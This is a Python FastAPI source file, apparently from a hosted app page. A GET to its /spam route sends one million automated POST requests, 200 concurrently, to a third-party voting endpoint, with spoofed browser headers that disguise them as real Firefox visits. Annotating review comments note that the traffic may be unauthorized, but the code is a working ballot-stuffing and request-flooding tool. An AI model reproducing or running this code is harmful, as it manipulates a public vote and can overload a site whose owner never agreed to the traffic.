test2 / app.py
TornadoAI's picture
test
ecd7f36
Raw
History Blame Contribute Delete
1.64 kB
import asyncio
import time
import aiohttp
from fastapi import FastAPI
# Endpoint that every request issued by send_vote() is POSTed to.
TARGET_URL = "https://dontspam.this.superhot.pics/vote"
# Size of the semaphore built in main(); it is passed to every send_vote() call.
CONCURRENT_REQUESTS = 200 # Simultaneous requests
# Number of send_vote() calls that main() schedules per run.
TOTAL_REQUESTS = 1000000
# Headers attached to every POST. All values are fixed strings (a Firefox-style
# User-Agent plus Referer/Origin/Sec-Fetch-* fields); nothing here is derived
# from a live browser session.
# NOTE(review): combined with the constants above, this looks like a bulk
# automated poster aimed at an external host -- confirm the endpoint's owner
# has authorized this traffic before running it.
HEADERS = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0",
"Accept": "application/json",
"Referer": "https://america.remy.cam/",
"Origin": "https://america.remy.cam",
"Sec-GPC": "1",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "cross-site",
}
# Module-level tallies mutated by send_vote() and read by the HTTP handlers.
# Nothing in the visible code resets them, so they accumulate across runs
# within one process.
success = 0
failed = 0
# Send one POST to TARGET_URL and record the outcome in the global counters.
#
# session:   object whose .post(...) is used as an async context manager
#            (main() passes an aiohttp.ClientSession).
# semaphore: async context manager entered before the request is made
#            (main() passes an asyncio.Semaphore).
#
# Returns None. An HTTP 200 increments `success`; any other status, or any
# exception raised while making the request, increments `failed`.
async def send_vote(session, semaphore):
global success, failed
async with semaphore:
try:
# NOTE(review): timeout=5 is presumably a 5-second total timeout; aiohttp
# documents aiohttp.ClientTimeout(total=5) as the supported form -- confirm
# against the installed aiohttp version.
async with session.post(TARGET_URL, headers=HEADERS, timeout=5) as resp:
if resp.status == 200:
success += 1
else:
failed += 1
# NOTE(review): a bare `except:` also catches asyncio.CancelledError and
# KeyboardInterrupt, so an in-flight request absorbs a cancellation and
# counts it as a failure; `except Exception:` would let those propagate.
except:
failed += 1
# Emit a progress line whenever the combined tally is a multiple of 1000.
if (success + failed) % 1000 == 0:
print(
f"Progress: {success + failed} | Success: {success} | Failed: {failed}"
)
# Schedule TOTAL_REQUESTS send_vote() calls that share one aiohttp.ClientSession
# and one asyncio.Semaphore(CONCURRENT_REQUESTS), then wait for all of them.
# Returns None; results are reported only through the global counters.
async def main():
semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)
async with aiohttp.ClientSession() as session:
# Every coroutine object is created up front and handed to gather() in one call.
tasks = [send_vote(session, semaphore) for _ in range(TOTAL_REQUESTS)]
await asyncio.gather(*tasks)
# FastAPI application object; the @app.get decorators in this file register routes on it.
app = FastAPI()
# GET /spam: run main() to completion, then return the elapsed time and the
# global success/failed tallies as a single string under the "Hello" key.
# The message text is French ("Fini en" = "Finished in", "Succès" =
# "Successes", "Échecs" = "Failures").
# NOTE(review): no authentication or rate limiting is visible on this route,
# so any GET to /spam starts a full run, and the response is sent only after
# that run has finished. The tallies are process-wide, so the reported numbers
# include earlier runs.
@app.get("/spam")
def spam():
start = time.time()
# asyncio.run() starts a new event loop for this call and blocks until main() returns.
asyncio.run(main())
return {
"Hello": f"\nFini en {time.time() - start:.2f}s | Succès: {success} | Échecs: {failed}"
}
@app.get("/")
def greet_json():
    """Report the current values of the module-level request counters.

    Returns:
        A dict with the keys "success" and "failed", each holding the
        corresponding module-level tally at the time of the call.
    """
    counters = {}
    counters["success"] = success
    counters["failed"] = failed
    return counters